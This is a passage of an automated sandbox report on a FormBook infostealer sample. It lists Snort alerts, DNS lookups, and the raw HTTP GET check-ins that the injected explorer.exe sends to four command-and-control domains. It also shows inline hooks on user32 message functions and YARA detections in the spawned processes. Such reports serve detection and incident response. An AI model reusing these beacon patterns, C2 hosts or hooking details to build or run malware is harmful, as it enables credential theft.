                                      COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                      ole32.dllOleInitialize, OleUninitialize, CoCreateInstance
                                      VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                      Possible Origin

                                      Language of compilation systemCountry where language is spokenMap
                                      EnglishUnited States

                                      Network Behavior

                                      Snort IDS Alerts

                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                      04/08/21-12:28:02.299363TCP1201ATTACK-RESPONSES 403 Forbidden804976634.102.136.180192.168.2.4
                                      04/08/21-12:28:25.088543TCP1201ATTACK-RESPONSES 403 Forbidden804976934.102.136.180192.168.2.4
                                      04/08/21-12:28:43.295202TCP2031453ET TROJAN FormBook CnC Checkin (GET)4977080192.168.2.434.102.136.180
                                      04/08/21-12:28:43.295202TCP2031449ET TROJAN FormBook CnC Checkin (GET)4977080192.168.2.434.102.136.180
                                      04/08/21-12:28:43.295202TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977080192.168.2.434.102.136.180
                                      04/08/21-12:28:43.409063TCP1201ATTACK-RESPONSES 403 Forbidden804977034.102.136.180192.168.2.4

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Apr 8, 2021 12:27:41.465953112 CEST4976080192.168.2.469.163.220.52
                                      Apr 8, 2021 12:27:41.620493889 CEST804976069.163.220.52192.168.2.4
                                      Apr 8, 2021 12:27:41.620574951 CEST4976080192.168.2.469.163.220.52
                                      Apr 8, 2021 12:27:41.620716095 CEST4976080192.168.2.469.163.220.52
                                      Apr 8, 2021 12:27:41.775491953 CEST804976069.163.220.52192.168.2.4
                                      Apr 8, 2021 12:27:41.775533915 CEST804976069.163.220.52192.168.2.4
                                      Apr 8, 2021 12:27:41.775551081 CEST804976069.163.220.52192.168.2.4
                                      Apr 8, 2021 12:27:41.775660992 CEST4976080192.168.2.469.163.220.52
                                      Apr 8, 2021 12:27:41.775732994 CEST4976080192.168.2.469.163.220.52
                                      Apr 8, 2021 12:27:41.931611061 CEST804976069.163.220.52192.168.2.4
                                      Apr 8, 2021 12:28:02.170397043 CEST4976680192.168.2.434.102.136.180
                                      Apr 8, 2021 12:28:02.183226109 CEST804976634.102.136.180192.168.2.4
                                      Apr 8, 2021 12:28:02.183315039 CEST4976680192.168.2.434.102.136.180
                                      Apr 8, 2021 12:28:02.183496952 CEST4976680192.168.2.434.102.136.180
                                      Apr 8, 2021 12:28:02.196137905 CEST804976634.102.136.180192.168.2.4
                                      Apr 8, 2021 12:28:02.299362898 CEST804976634.102.136.180192.168.2.4
                                      Apr 8, 2021 12:28:02.299391031 CEST804976634.102.136.180192.168.2.4
                                      Apr 8, 2021 12:28:02.299635887 CEST4976680192.168.2.434.102.136.180
                                      Apr 8, 2021 12:28:02.299704075 CEST4976680192.168.2.434.102.136.180
                                      Apr 8, 2021 12:28:02.312124014 CEST804976634.102.136.180192.168.2.4
                                      Apr 8, 2021 12:28:24.894125938 CEST4976980192.168.2.434.102.136.180
                                      Apr 8, 2021 12:28:24.908015013 CEST804976934.102.136.180192.168.2.4
                                      Apr 8, 2021 12:28:24.908196926 CEST4976980192.168.2.434.102.136.180
                                      Apr 8, 2021 12:28:24.908379078 CEST4976980192.168.2.434.102.136.180
                                      Apr 8, 2021 12:28:24.925878048 CEST804976934.102.136.180192.168.2.4
                                      Apr 8, 2021 12:28:25.088542938 CEST804976934.102.136.180192.168.2.4
                                      Apr 8, 2021 12:28:25.088572025 CEST804976934.102.136.180192.168.2.4
                                      Apr 8, 2021 12:28:25.088747025 CEST4976980192.168.2.434.102.136.180
                                      Apr 8, 2021 12:28:25.089088917 CEST4976980192.168.2.434.102.136.180
                                      Apr 8, 2021 12:28:25.101531029 CEST804976934.102.136.180192.168.2.4
                                      Apr 8, 2021 12:28:43.282567024 CEST4977080192.168.2.434.102.136.180
                                      Apr 8, 2021 12:28:43.294913054 CEST804977034.102.136.180192.168.2.4
                                      Apr 8, 2021 12:28:43.295043945 CEST4977080192.168.2.434.102.136.180
                                      Apr 8, 2021 12:28:43.295202017 CEST4977080192.168.2.434.102.136.180
                                      Apr 8, 2021 12:28:43.307471991 CEST804977034.102.136.180192.168.2.4
                                      Apr 8, 2021 12:28:43.409063101 CEST804977034.102.136.180192.168.2.4
                                      Apr 8, 2021 12:28:43.409204960 CEST804977034.102.136.180192.168.2.4
                                      Apr 8, 2021 12:28:43.409269094 CEST4977080192.168.2.434.102.136.180
                                      Apr 8, 2021 12:28:43.409306049 CEST4977080192.168.2.434.102.136.180
                                      Apr 8, 2021 12:28:43.423803091 CEST804977034.102.136.180192.168.2.4

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Apr 8, 2021 12:26:35.185254097 CEST5802853192.168.2.48.8.8.8
                                      Apr 8, 2021 12:26:35.217926979 CEST53580288.8.8.8192.168.2.4
                                      Apr 8, 2021 12:26:35.575154066 CEST5309753192.168.2.48.8.8.8
                                      Apr 8, 2021 12:26:35.588382959 CEST53530978.8.8.8192.168.2.4
                                      Apr 8, 2021 12:26:36.324259996 CEST4925753192.168.2.48.8.8.8
                                      Apr 8, 2021 12:26:36.337037086 CEST53492578.8.8.8192.168.2.4
                                      Apr 8, 2021 12:26:43.994112015 CEST6238953192.168.2.48.8.8.8
                                      Apr 8, 2021 12:26:44.006736994 CEST53623898.8.8.8192.168.2.4
                                      Apr 8, 2021 12:26:44.795666933 CEST4991053192.168.2.48.8.8.8
                                      Apr 8, 2021 12:26:44.808929920 CEST53499108.8.8.8192.168.2.4
                                      Apr 8, 2021 12:26:45.788333893 CEST5585453192.168.2.48.8.8.8
                                      Apr 8, 2021 12:26:45.800919056 CEST53558548.8.8.8192.168.2.4
                                      Apr 8, 2021 12:26:46.666851044 CEST6454953192.168.2.48.8.8.8
                                      Apr 8, 2021 12:26:46.679826975 CEST53645498.8.8.8192.168.2.4
                                      Apr 8, 2021 12:26:48.438355923 CEST6315353192.168.2.48.8.8.8
                                      Apr 8, 2021 12:26:48.451751947 CEST53631538.8.8.8192.168.2.4
                                      Apr 8, 2021 12:26:49.404546976 CEST5299153192.168.2.48.8.8.8
                                      Apr 8, 2021 12:26:49.417890072 CEST53529918.8.8.8192.168.2.4
                                      Apr 8, 2021 12:26:50.460009098 CEST5370053192.168.2.48.8.8.8
                                      Apr 8, 2021 12:26:50.472664118 CEST53537008.8.8.8192.168.2.4
                                      Apr 8, 2021 12:26:51.404746056 CEST5172653192.168.2.48.8.8.8
                                      Apr 8, 2021 12:26:51.420192957 CEST53517268.8.8.8192.168.2.4
                                      Apr 8, 2021 12:26:52.277659893 CEST5679453192.168.2.48.8.8.8
                                      Apr 8, 2021 12:26:52.290190935 CEST53567948.8.8.8192.168.2.4
                                      Apr 8, 2021 12:26:53.223326921 CEST5653453192.168.2.48.8.8.8
                                      Apr 8, 2021 12:26:53.236185074 CEST53565348.8.8.8192.168.2.4
                                      Apr 8, 2021 12:26:54.315073967 CEST5662753192.168.2.48.8.8.8
                                      Apr 8, 2021 12:26:54.329687119 CEST53566278.8.8.8192.168.2.4
                                      Apr 8, 2021 12:26:55.079834938 CEST5662153192.168.2.48.8.8.8
                                      Apr 8, 2021 12:26:55.092345953 CEST53566218.8.8.8192.168.2.4
                                      Apr 8, 2021 12:27:06.022429943 CEST6311653192.168.2.48.8.8.8
                                      Apr 8, 2021 12:27:06.035130978 CEST53631168.8.8.8192.168.2.4
                                      Apr 8, 2021 12:27:25.859730005 CEST6407853192.168.2.48.8.8.8
                                      Apr 8, 2021 12:27:25.873265982 CEST53640788.8.8.8192.168.2.4
                                      Apr 8, 2021 12:27:27.783050060 CEST6480153192.168.2.48.8.8.8
                                      Apr 8, 2021 12:27:27.854206085 CEST53648018.8.8.8192.168.2.4
                                      Apr 8, 2021 12:27:28.419117928 CEST6172153192.168.2.48.8.8.8
                                      Apr 8, 2021 12:27:28.474838018 CEST53617218.8.8.8192.168.2.4
                                      Apr 8, 2021 12:27:28.519038916 CEST5125553192.168.2.48.8.8.8
                                      Apr 8, 2021 12:27:28.532649040 CEST53512558.8.8.8192.168.2.4
                                      Apr 8, 2021 12:27:28.973104954 CEST6152253192.168.2.48.8.8.8
                                      Apr 8, 2021 12:27:28.986398935 CEST53615228.8.8.8192.168.2.4
                                      Apr 8, 2021 12:27:29.363286972 CEST5233753192.168.2.48.8.8.8
                                      Apr 8, 2021 12:27:29.376493931 CEST53523378.8.8.8192.168.2.4
                                      Apr 8, 2021 12:27:29.548408985 CEST5504653192.168.2.48.8.8.8
                                      Apr 8, 2021 12:27:29.574208975 CEST53550468.8.8.8192.168.2.4
                                      Apr 8, 2021 12:27:29.814661980 CEST4961253192.168.2.48.8.8.8
                                      Apr 8, 2021 12:27:29.827439070 CEST53496128.8.8.8192.168.2.4
                                      Apr 8, 2021 12:27:30.255325079 CEST4928553192.168.2.48.8.8.8
                                      Apr 8, 2021 12:27:30.268846035 CEST53492858.8.8.8192.168.2.4
                                      Apr 8, 2021 12:27:30.637536049 CEST5060153192.168.2.48.8.8.8
                                      Apr 8, 2021 12:27:30.702814102 CEST53506018.8.8.8192.168.2.4
                                      Apr 8, 2021 12:27:31.303796053 CEST6087553192.168.2.48.8.8.8
                                      Apr 8, 2021 12:27:31.316726923 CEST53608758.8.8.8192.168.2.4
                                      Apr 8, 2021 12:27:31.858030081 CEST5644853192.168.2.48.8.8.8
                                      Apr 8, 2021 12:27:31.870361090 CEST53564488.8.8.8192.168.2.4
                                      Apr 8, 2021 12:27:31.957674026 CEST5917253192.168.2.48.8.8.8
                                      Apr 8, 2021 12:27:32.040802002 CEST53591728.8.8.8192.168.2.4
                                      Apr 8, 2021 12:27:32.336369038 CEST6242053192.168.2.48.8.8.8
                                      Apr 8, 2021 12:27:32.349597931 CEST53624208.8.8.8192.168.2.4
                                      Apr 8, 2021 12:27:32.819674969 CEST6057953192.168.2.48.8.8.8
                                      Apr 8, 2021 12:27:32.832504988 CEST53605798.8.8.8192.168.2.4
                                      Apr 8, 2021 12:27:33.856560946 CEST5018353192.168.2.48.8.8.8
                                      Apr 8, 2021 12:27:33.869515896 CEST53501838.8.8.8192.168.2.4
                                      Apr 8, 2021 12:27:41.262495995 CEST6153153192.168.2.48.8.8.8
                                      Apr 8, 2021 12:27:41.459153891 CEST53615318.8.8.8192.168.2.4
                                      Apr 8, 2021 12:27:45.038957119 CEST4922853192.168.2.48.8.8.8
                                      Apr 8, 2021 12:27:45.052339077 CEST53492288.8.8.8192.168.2.4
                                      Apr 8, 2021 12:28:02.128470898 CEST5979453192.168.2.48.8.8.8
                                      Apr 8, 2021 12:28:02.168994904 CEST53597948.8.8.8192.168.2.4
                                      Apr 8, 2021 12:28:15.093986988 CEST5591653192.168.2.48.8.8.8
                                      Apr 8, 2021 12:28:15.106564999 CEST53559168.8.8.8192.168.2.4
                                      Apr 8, 2021 12:28:16.849348068 CEST5275253192.168.2.48.8.8.8
                                      Apr 8, 2021 12:28:16.881546021 CEST53527528.8.8.8192.168.2.4
                                      Apr 8, 2021 12:28:24.871767044 CEST6054253192.168.2.48.8.8.8
                                      Apr 8, 2021 12:28:24.892980099 CEST53605428.8.8.8192.168.2.4
                                      Apr 8, 2021 12:28:43.241204977 CEST6068953192.168.2.48.8.8.8
                                      Apr 8, 2021 12:28:43.281166077 CEST53606898.8.8.8192.168.2.4

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                      Apr 8, 2021 12:27:41.262495995 CEST192.168.2.48.8.8.80x88a3Standard query (0)www.contecoliving.comA (IP address)IN (0x0001)
                                      Apr 8, 2021 12:28:02.128470898 CEST192.168.2.48.8.8.80xa1d3Standard query (0)www.identityofplace.comA (IP address)IN (0x0001)
                                      Apr 8, 2021 12:28:24.871767044 CEST192.168.2.48.8.8.80x36Standard query (0)www.constipationhub.comA (IP address)IN (0x0001)
                                      Apr 8, 2021 12:28:43.241204977 CEST192.168.2.48.8.8.80xc57dStandard query (0)www.tententacleshydro.comA (IP address)IN (0x0001)

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                      Apr 8, 2021 12:27:41.459153891 CEST8.8.8.8192.168.2.40x88a3No error (0)www.contecoliving.com69.163.220.52A (IP address)IN (0x0001)
                                      Apr 8, 2021 12:28:02.168994904 CEST8.8.8.8192.168.2.40xa1d3No error (0)www.identityofplace.comidentityofplace.comCNAME (Canonical name)IN (0x0001)
                                      Apr 8, 2021 12:28:02.168994904 CEST8.8.8.8192.168.2.40xa1d3No error (0)identityofplace.com34.102.136.180A (IP address)IN (0x0001)
                                      Apr 8, 2021 12:28:24.892980099 CEST8.8.8.8192.168.2.40x36No error (0)www.constipationhub.comconstipationhub.comCNAME (Canonical name)IN (0x0001)
                                      Apr 8, 2021 12:28:24.892980099 CEST8.8.8.8192.168.2.40x36No error (0)constipationhub.com34.102.136.180A (IP address)IN (0x0001)
                                      Apr 8, 2021 12:28:43.281166077 CEST8.8.8.8192.168.2.40xc57dNo error (0)www.tententacleshydro.comtententacleshydro.comCNAME (Canonical name)IN (0x0001)
                                      Apr 8, 2021 12:28:43.281166077 CEST8.8.8.8192.168.2.40xc57dNo error (0)tententacleshydro.com34.102.136.180A (IP address)IN (0x0001)

                                      HTTP Request Dependency Graph

                                      • www.contecoliving.com
                                      • www.identityofplace.com
                                      • www.constipationhub.com
                                      • www.tententacleshydro.com

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      0192.168.2.44976069.163.220.5280C:\Windows\explorer.exe
                                      TimestampkBytes transferredDirectionData
                                      Apr 8, 2021 12:27:41.620716095 CEST2074OUTGET /klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=uZ2w+Z4jIpZbISXEVO0nnlcpcZqOXsEZ5ezvcOQFXu1NON7E3/DXgqh3GDvoQCt7q85D HTTP/1.1
                                      Host: www.contecoliving.com
                                      Connection: close
                                      Data Raw: 00 00 00 00 00 00 00
                                      Data Ascii:
                                      Apr 8, 2021 12:27:41.775533915 CEST2075INHTTP/1.1 301 Moved Permanently
                                      Date: Thu, 08 Apr 2021 10:27:41 GMT
                                      Server: Apache
                                      Location: https://www.contecoliving.com/klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=uZ2w+Z4jIpZbISXEVO0nnlcpcZqOXsEZ5ezvcOQFXu1NON7E3/DXgqh3GDvoQCt7q85D
                                      Content-Length: 346
                                      Connection: close
                                      Content-Type: text/html; charset=iso-8859-1
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6f 6e 74 65 63 6f 6c 69 76 69 6e 67 2e 63 6f 6d 2f 6b 6c 66 2f 3f 4b 58 36 78 4d 3d 30 72 6a 50 6f 66 71 68 53 5a 66 58 66 30 55 70 26 61 6d 70 3b 2d 5a 56 78 59 38 48 3d 75 5a 32 77 2b 5a 34 6a 49 70 5a 62 49 53 58 45 56 4f 30 6e 6e 6c 63 70 63 5a 71 4f 58 73 45 5a 35 65 7a 76 63 4f 51 46 58 75 31 4e 4f 4e 37 45 33 2f 44 58 67 71 68 33 47 44 76 6f 51 43 74 37 71 38 35 44 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.contecoliving.com/klf/?KX6xM=0rjPofqhSZfXf0Up&amp;-ZVxY8H=uZ2w+Z4jIpZbISXEVO0nnlcpcZqOXsEZ5ezvcOQFXu1NON7E3/DXgqh3GDvoQCt7q85D">here</a>.</p></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      1192.168.2.44976634.102.136.18080C:\Windows\explorer.exe
                                      TimestampkBytes transferredDirectionData
                                      Apr 8, 2021 12:28:02.183496952 CEST5879OUTGET /klf/?-ZVxY8H=7bFgTrM7BIAhZVbcluuTkCF4DvVfpU2z3yBqmRvieMtJ1CCKShP62AIfkuNBDgKt+AQL&KX6xM=0rjPofqhSZfXf0Up HTTP/1.1
                                      Host: www.identityofplace.com
                                      Connection: close
                                      Data Raw: 00 00 00 00 00 00 00
                                      Data Ascii:
                                      Apr 8, 2021 12:28:02.299362898 CEST5879INHTTP/1.1 403 Forbidden
                                      Server: openresty
                                      Date: Thu, 08 Apr 2021 10:28:02 GMT
                                      Content-Type: text/html
                                      Content-Length: 275
                                      ETag: "6063a886-113"
                                      Via: 1.1 google
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      2192.168.2.44976934.102.136.18080C:\Windows\explorer.exe
                                      TimestampkBytes transferredDirectionData
                                      Apr 8, 2021 12:28:24.908379078 CEST5899OUTGET /klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=YaIPTfple60n7g7yPaoibbVQRqDMQPAJpva4MWGp8vGpJzNikHS3aMUGlaJr1Ei+7AZ8 HTTP/1.1
                                      Host: www.constipationhub.com
                                      Connection: close
                                      Data Raw: 00 00 00 00 00 00 00
                                      Data Ascii:
                                      Apr 8, 2021 12:28:25.088542938 CEST5899INHTTP/1.1 403 Forbidden
                                      Server: openresty
                                      Date: Thu, 08 Apr 2021 10:28:24 GMT
                                      Content-Type: text/html
                                      Content-Length: 275
                                      ETag: "605db497-113"
                                      Via: 1.1 google
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      3192.168.2.44977034.102.136.18080C:\Windows\explorer.exe
                                      TimestampkBytes transferredDirectionData
                                      Apr 8, 2021 12:28:43.295202017 CEST5901OUTGET /klf/?-ZVxY8H=Vu9q6EMrxGDqg7ZmTlOQb6qpgFgK5wW/L8aO6You1Lc6UR7BvVtveZZ7OpvOdghAil0A&KX6xM=0rjPofqhSZfXf0Up HTTP/1.1
                                      Host: www.tententacleshydro.com
                                      Connection: close
                                      Data Raw: 00 00 00 00 00 00 00
                                      Data Ascii:
                                      Apr 8, 2021 12:28:43.409063101 CEST5902INHTTP/1.1 403 Forbidden
                                      Server: openresty
                                      Date: Thu, 08 Apr 2021 10:28:43 GMT
                                      Content-Type: text/html
                                      Content-Length: 275
                                      ETag: "605e0bc6-113"
                                      Via: 1.1 google
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                      Code Manipulations

                                      User Modules

                                      Hook Summary

                                      Function NameHook TypeActive in Processes
                                      PeekMessageAINLINEexplorer.exe
                                      PeekMessageWINLINEexplorer.exe
                                      GetMessageWINLINEexplorer.exe
                                      GetMessageAINLINEexplorer.exe

                                      Processes

                                      Process: explorer.exe, Module: user32.dll
                                      Function NameHook TypeNew Data
                                      PeekMessageAINLINE0x48 0x8B 0xB8 0x82 0x2E 0xE1
                                      PeekMessageWINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xE1
                                      GetMessageWINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xE1
                                      GetMessageAINLINE0x48 0x8B 0xB8 0x82 0x2E 0xE1

                                      Statistics

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      Analysis Process: Y4U48592345670954.exe PID: 7016 Parent PID: 6016

                                      General

                                      Start time:12:26:42
                                      Start date:08/04/2021
                                      Path:C:\Users\user\Desktop\Y4U48592345670954.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Users\user\Desktop\Y4U48592345670954.exe'
                                      Imagebase:0x400000
                                      File size:227550 bytes
                                      MD5 hash:E8E69391D3A931E6638ADAEBF6A339F6
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.660097535.0000000002850000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.660097535.0000000002850000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.660097535.0000000002850000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:low

                                      Analysis Process: Y4U48592345670954.exe PID: 7080 Parent PID: 7016

                                      General

                                      Start time:12:26:43
                                      Start date:08/04/2021
                                      Path:C:\Users\user\Desktop\Y4U48592345670954.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Users\user\Desktop\Y4U48592345670954.exe'
                                      Imagebase:0x400000
                                      File size:227550 bytes
                                      MD5 hash:E8E69391D3A931E6638ADAEBF6A339F6
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.689282253.0000000000590000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.689282253.0000000000590000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.689282253.0000000000590000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:low

                                      Analysis Process: explorer.exe PID: 3424 Parent PID: 7080

                                      General

                                      Start time:12:26:46
                                      Start date:08/04/2021
                                      Path:C:\Windows\explorer.exe
                                      Wow64 process (32bit):false
                                      Commandline:
                                      Imagebase:0x7ff6fee60000
                                      File size:3933184 bytes
                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Analysis Process: NETSTAT.EXE PID: 2628 Parent PID: 3424

                                      General

                                      Start time:12:26:57
                                      Start date:08/04/2021
                                      Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                                      Imagebase:0xdd0000
                                      File size:32768 bytes
                                      MD5 hash:4E20FF629119A809BC0E7EE2D18A7FDB
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
